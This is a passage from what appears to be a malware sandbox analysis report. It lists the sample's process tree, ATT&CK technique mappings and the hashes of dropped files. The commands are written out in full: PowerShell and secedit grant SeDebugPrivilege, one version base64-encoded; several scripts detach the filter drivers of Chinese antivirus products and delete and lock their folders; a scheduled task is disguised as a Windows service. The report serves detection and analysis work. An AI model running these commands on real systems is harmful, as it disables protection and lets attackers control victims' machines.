        powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.*')) -Force;"
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2880
      - C:\Windows\SysWOW64\SecEdit.exe
        
        "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege3.sdb /cfg C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege3.inf /overwrite /log C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege3.log /quiet
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2456
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;"
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:640
      - C:\Windows\SysWOW64\SecEdit.exe
        
        "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege4.sdb /cfg C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege4.inf /overwrite /log C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege4.log /quiet
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1996
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c echo.>c:\inst.ini
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:952
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass $ErrorActionPreference='SilentlyContinue';$360safe = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -like '*360°²È«ÎÀÊ¿*' } | ForEach-Object { $_.InstallLocation };if ($360safe){$360drive = [IO.Path]::GetPathRoot($360safe).TrimEnd('\');fltmc.exe detach 360Box64 $360drive;fltmc.exe detach 360FsFlt $360drive;fltmc.exe detach 360qpesv $360drive;fltmc.exe detach DsArk $360drive;Remove-Item -Path $360safe -Recurse -Force;(Get-ChildItem -Path $360safe -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $360safe /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\360safe.ini';}
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:2632
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass $ErrorActionPreference='SilentlyContinue';$360safe = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -like '*360sd*' } | ForEach-Object { $_.InstallLocation };if ($360safe){$360drive = [IO.Path]::GetPathRoot($360safe).TrimEnd('\');fltmc.exe detach 360Box64 $360drive;fltmc.exe detach 360FsFlt $360drive;fltmc.exe detach 360qpesv $360drive;fltmc.exe detach DsArk $360drive;Remove-Item -Path $360safe -Recurse -Force;(Get-ChildItem -Path $360safe -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $360safe /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\360sd.ini';}
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:2592
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -ExecutionPolicy Bypass $ErrorActionPreference='SilentlyContinue';$huorong_path = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -match '»ðÈÞ' } | ForEach-Object { [IO.Path]::GetDirectoryName($_.UninstallString)} };if ($huorong_path){$huorong_drive = [IO.Path]::GetPathRoot($huorong_path).TrimEnd('\');fltmc.exe detach sysdiag $huorong_drive;Remove-Item -Path $huorong_path -Recurse -Force;(Get-ChildItem -Path $huorong_path -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $huorong_path /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}
        5⤵
        Command and Scripting Interpreter: PowerShell
        Hide Artifacts: Ignore Process Interrupts
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:752
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder(ÏµÍ³ÒôÆµ·þÎñ)" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1016
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks.exe /create /tn "Windows Audio Endpoint Builder(ÏµÍ³ÒôÆµ·þÎñ)" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
        6⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:2108
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass $ErrorActionPreference='SilentlyContinue';$360safe = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -like '*360°²È«ÎÀÊ¿*' } | ForEach-Object { $_.InstallLocation };if ($360safe){$360drive = [IO.Path]::GetPathRoot($360safe).TrimEnd('\');fltmc.exe detach 360Box64 $360drive;fltmc.exe detach 360FsFlt $360drive;fltmc.exe detach 360qpesv $360drive;fltmc.exe detach DsArk $360drive;Remove-Item -Path $360safe -Recurse -Force;(Get-ChildItem -Path $360safe -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $360safe /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\360safe.ini';}
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:2924
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass $ErrorActionPreference='SilentlyContinue';$360safe = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -like '*360sd*' } | ForEach-Object { $_.InstallLocation };if ($360safe){$360drive = [IO.Path]::GetPathRoot($360safe).TrimEnd('\');fltmc.exe detach 360Box64 $360drive;fltmc.exe detach 360FsFlt $360drive;fltmc.exe detach 360qpesv $360drive;fltmc.exe detach DsArk $360drive;Remove-Item -Path $360safe -Recurse -Force;(Get-ChildItem -Path $360safe -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $360safe /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\360sd.ini';}
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:2584
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -ExecutionPolicy Bypass $ErrorActionPreference='SilentlyContinue';$huorong_path = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -match '»ðÈÞ' } | ForEach-Object { [IO.Path]::GetDirectoryName($_.UninstallString)} };if ($huorong_path){$huorong_drive = [IO.Path]::GetPathRoot($huorong_path).TrimEnd('\');fltmc.exe detach sysdiag $huorong_drive;Remove-Item -Path $huorong_path -Recurse -Force;(Get-ChildItem -Path $huorong_path -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $huorong_path /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}
        5⤵
        Command and Scripting Interpreter: PowerShell
        Hide Artifacts: Ignore Process Interrupts
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:2680
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference='SilentlyContinue';$360safe = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -like '*360°²È«ÎÀÊ¿*' } | ForEach-Object { $_.InstallLocation };if ($360safe){$360drive = [IO.Path]::GetPathRoot($360safe).TrimEnd('\');fltmc.exe detach 360Box64 $360drive;fltmc.exe detach 360FsFlt $360drive;fltmc.exe detach 360qpesv $360drive;fltmc.exe detach DsArk $360drive;Remove-Item -Path $360safe -Recurse -Force;(Get-ChildItem -Path $360safe -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $360safe /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Hide Artifacts: Ignore Process Interrupts
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1404
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference='SilentlyContinue';$360safe = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -like '*360sd*' } | ForEach-Object { $_.InstallLocation };if ($360safe){$360drive = [IO.Path]::GetPathRoot($360safe).TrimEnd('\');fltmc.exe detach 360Box64 $360drive;fltmc.exe detach 360FsFlt $360drive;fltmc.exe detach 360qpesv $360drive;fltmc.exe detach DsArk $360drive;Remove-Item -Path $360safe -Recurse -Force;(Get-ChildItem -Path $360safe -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $360safe /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Hide Artifacts: Ignore Process Interrupts
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2580
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference='SilentlyContinue';$huorong_path = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -match 'ÌÚÑ¶µçÄÔ¹Ü¼Ò' } | ForEach-Object { [IO.Path]::GetDirectoryName($_.UninstallString.Replace([string][char]34,''))} };if ($huorong_path){$huorong_drive = [IO.Path]::GetPathRoot($huorong_path).TrimEnd('\');fltmc.exe detach TFsFlt $huorong_drive;Remove-Item -Path $huorong_path -Recurse -Force;(Get-ChildItem -Path $huorong_path -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $huorong_path /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Hide Artifacts: Ignore Process Interrupts
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2680
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference='SilentlyContinue';$huorong_path = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -match '»ðÈÞ' } | ForEach-Object { [IO.Path]::GetDirectoryName($_.UninstallString)} };if ($huorong_path){$huorong_drive = [IO.Path]::GetPathRoot($huorong_path).TrimEnd('\');fltmc.exe detach sysdiag $huorong_drive;Remove-Item -Path $huorong_path -Recurse -Force;(Get-ChildItem -Path $huorong_path -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $huorong_path /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Hide Artifacts: Ignore Process Interrupts
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1976
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference='SilentlyContinue';$huorong_path = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -match '½ðÉ½¶¾°Ô' } | ForEach-Object { [IO.Path]::GetDirectoryName($_.UninstallString.Replace([string][char]34,''))} };if ($huorong_path){$huorong_drive = [IO.Path]::GetPathRoot($huorong_path).TrimEnd('\');fltmc.exe detach kisknl $huorong_drive;Remove-Item -Path $huorong_path -Recurse -Force;(Get-ChildItem -Path $huorong_path -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $huorong_path /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Hide Artifacts: Ignore Process Interrupts
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2496

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Hide Artifacts

T1564

Ignore Process Interrupts

T1564.011

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Remote Services

T1021

Remote Desktop Protocol

T1021.001

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\MicrosoftNetFramework.xml

Filesize
3KB

MD5
69c282fdcd177c1ac4d6709ef841da65

SHA1
575cbac132f5215c9446e6b440ca44a2082f0644

SHA256
943f169c31c319417e61586d8911057321de04926e01e4cc3e6f57b3b032c28e

SHA512
6b686a5d6aabe4681c6e1c83d4f32bd55d9fa26fc25ed72ecd20676c6dd3bd49cee4f1e5d1b25f2d3a90a994be00bf3b1366075272d4c3ea16917806dbbe0ea7

Download Submit
C:\ProgramData\Microsoft\Program\ziliao.jpg

Filesize
229KB

MD5
414c48be37368dc904027019ec2f8206

SHA1
e6606f2018f7a37c3f967d470e38887366a76bb3

SHA256
391796e6dfdc02267c08286663f74ea09c45b724562785366a102c3a7f9a5812

SHA512
1b700a0b2439d7a2bfbdec5364d0b1f40b5ceb58761c8c42aaa836eba49f952eba32c72ae0189926e2b1532ab50cc31fd9d129c05bba1da7e22f279a49c79734

Download Submit
C:\ProgramData\Program\Uninstall_.exe

Filesize
475KB

MD5
8d033e8817a7a1c54119523e668f5a32

SHA1
579aec8780f968e6e7809e5899bf91d79a026485

SHA256
5d75ab6114577bcd82dd2705da8cc33c86bdc9c9fcd0f00a9756aeb18f13f96a

SHA512
909145a965f4a550b8e00bfb598b3f475ba7c8ee50d053e74f7208baed335b7f75dab3de1667921f07de4a8d6a44e6c23c355b681dee0a81189e6f09dcacd57d

Download Submit
C:\ProgramData\Program\iusb3mon.dat

Filesize
74KB

MD5
7db8e66ef74c2ba301c9de02a08aab79

SHA1
8e6fc2a3c2374d59602ed5cfc8db0cce528bff46

SHA256
9897994028e66eba4c5691fe6ab4d9df527580c8a48f42066e51a82bb6ae2ee9

SHA512
30f5f87c68b34d83a6805977d5f573a46ee2b52836b070368427e355aab5823dab617cbe946a93087335a52432ed8689eb527521427049fd4d5f15d01e205278

Download Submit
C:\ProgramData\Program\iusb3mon.exe

Filesize
475KB

MD5
e79f996b69d7fa546ed9235fdc0ee06d

SHA1
b1616a455947ef3f29a4b5afdeda99369fc20bf8

SHA256
ec7fcd3f4533d3514a9a42cbc41c40358eea47255bab1171146a5ccebaf20990

SHA512
c0fd12425188d81be78be91facace2a036b81e29ffe4fde13b613a40bc20b39c656f1e0d91542b87973ffd2bc44e05b0354ecb1a488d391ee68f48cf43b44cf6

Download Submit
C:\ProgramData\templateWatch.dat

Filesize
59KB

MD5
02ad2cd3401ba2b6535ca8c4c59cdca8

SHA1
0054da15c86ec69825d7b35c24bc59ae166b237a

SHA256
c05212a3b64061a29f774c854f53fe91f13da53728be15acb14aeb56cba715de

SHA512
045ec50ecb801f5713930fa37e2e08ff0341d98c38842b5c61954c20feb1ce15a90a3b73b4edacdd1b21b64566e4757e90e155b9a417b9d2ff9fa533f5360333

Download Submit
C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege1.log

Filesize
2KB

MD5
c6f29cf6f15bc123d0ac663038ccf886

SHA1
ad32e0b495d9d8e55265a3d5b0d6aad1f2123563

SHA256
467ef56719b3c527d861fb7874b121c8042500e86a15e04bbcef9b20834b6884

SHA512
c455195328246088393590197a08b19e530823510fe76247c786b96eb1ca32160969527b4eef571acef01b54d6406b04fe0cfb5a98b32290fe9fdd5c67ff23cc

Download Submit
C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege2.log

Filesize
2KB

MD5
84d68259f9ef9eed8a0506d0e3ee64c5

SHA1
3f794f6c237fd19b2a89bd3356d94f92f47d4e0c

SHA256
1c0c719476ce20f1c0e18654df032fac81baf82d62c5e314e15f9e5ff26a0f20

SHA512
b1aaa468ea0297e8d4ced88765e4c064db7986880537cd8f90b85872720234b78f7e1fb853460e5fd10175fc60570c2885b4a4e5143fd790e1a9d651f1bbac51

Download Submit
C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege3.log

Filesize
2KB

MD5
380c0bb0dff3c47f06e90e6908a34d1a

SHA1
ed7b26eafb1de476cb2e701fc278a509b367a77d

SHA256
b5c4688241bf8318161a0f72358ed49979e0b805e3277330322f2b659328d68e

SHA512
51d46e2c827e314540190ab06b6f28356aedecd7d8a7aaacc221a54d54f9a8538e60bfe7c1c75b6b1eeb9f432fdd2d5af46c77d8dde4966f45d96ebde49b5ca1

Download Submit
C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege4.log

Filesize
2KB

MD5
e56fb06f9a607aa6c8152a4fc8e96706

SHA1
bc38d07f503c3c49fe6e84a8022d53ac93082446

SHA256
dbd0fd8d055836f959b37fdace40b39eee306817c41da62e9fd34fa2d5196a12

SHA512
d7f370f50719df1c1622354d2093cd65ffd9223a2a09674eae47d52b713bd6cf84be215dddc8c2f1480cb12173c2251a3a83409ac6267bda46248b922df3265d

Download Submit
C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege4.log

Filesize
2KB

MD5
5a18280aed20e8cc704c6211597e4195

SHA1
4286c3091e9bd83e03f1dd3b498b26b5cfb3741d

SHA256
4ef2d1e0d41531cbf24b559261586d4abb7f3aaa8637bd895f630ed3b1d3ba45

SHA512
49051747339cd89a2d3892f8b133ef60ff696681cdeaa257039763c37c8d606904c6b2ca3c623adf1a2d7002f5f44f1418fea017d9fc42ef688d3d2b2230dd85

Download Submit
C:\Users\Admin\AppData\Local\Temp\_ir_tu2_temp_0\IRIMG2.JPG

Filesize
6KB

MD5
e39405e85e09f64ccde0f59392317dd3

SHA1
9c76db4b3d8c7972e7995ecfb1e3c47ee94fd14b

SHA256
cfd9677e1c0e10b1507f520c4ecd40f68db78154c0d4e6563403d540f3bf829f

SHA512
6733f330145b48d23c023c664090f4f240e9bbeb8368b486c8ee8682ec6a930b73275e24075648d1aa7e01db1ec7b7e259286917a006ba9af8fb7cba3439070a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZY4845C2NK15YRZTKTMY.temp

Filesize
7KB

MD5
eb94326a07ff30f9e987ac2e39818668

SHA1
354ac8b658ad4f5196d39120dc7a3a09e467c0ab

SHA256
82ddabdf59fa95860771bd0def41d59b70dc3c1b7652cc6702474eac587e2fe2

SHA512
f41e9322cf2e918ad64bda2847b0067fa7694b589bcb4a1189791dfb75c949e61bcc88812dc68cd1af3a39dc0d3f0758c889c9c737213de74d2180f7bdaddc30

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
100d0b6cd65919ac0ef5a980d7c8acf7

SHA1
68ca4389951a6aa18add2dfa7d6324d16dbd69b2

SHA256
ddf1ec4ae5a7eed5acd116ba240c0b86f9e5819457ee98996252516fd26f210b

SHA512
6d8915747377d2cc317b5ab509ea04d6ac0da1204f8713d05a2fd46fdfbdd09c94377353c1e2e8b38ce33b84ea3e3763ed2662f3348d50b42b47a6a6114a66e3

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
5786ad307f9a9ba50fa10d52ba920d3a

SHA1
5976480c26e2a43565723dc41ee38d3056a79a7a

SHA256
25c9e5f2fb204039021380d084d036c2cefd87b92a46a40e17c6ffc347e6c38d

SHA512
92ebbad5ace5d53d967267f0ff7a15b7895e060000ccbe6d2f9e79d00ffe90e83827c181bfacda9fa5c7bf3e919885d1f5b21b5cd10b52d71b5e4f5cb87c679f

Download Submit
\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe

Filesize
4.9MB

MD5
2a7d5f8d3fb4ab753b226fd88d31453b

SHA1
2ba2f1e7d4c5ff02a730920f0796cee9b174820c

SHA256
879109ae311e9b88f930ce1c659f29ec0e338687004318661e604d0d3727e3cf

SHA512
fa520ebf9e2626008f479c6e8f472514980d105f917c48ad638a64177d77c82a651c34ed3f28f3e39e67f12e50920503b66e373b5e92cf606bc81dc62a6b3ea4

Download Submit
\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\lua5.1.dll

Filesize
329KB

MD5
958103e55c74427e5c66d7e18f3bf237

SHA1
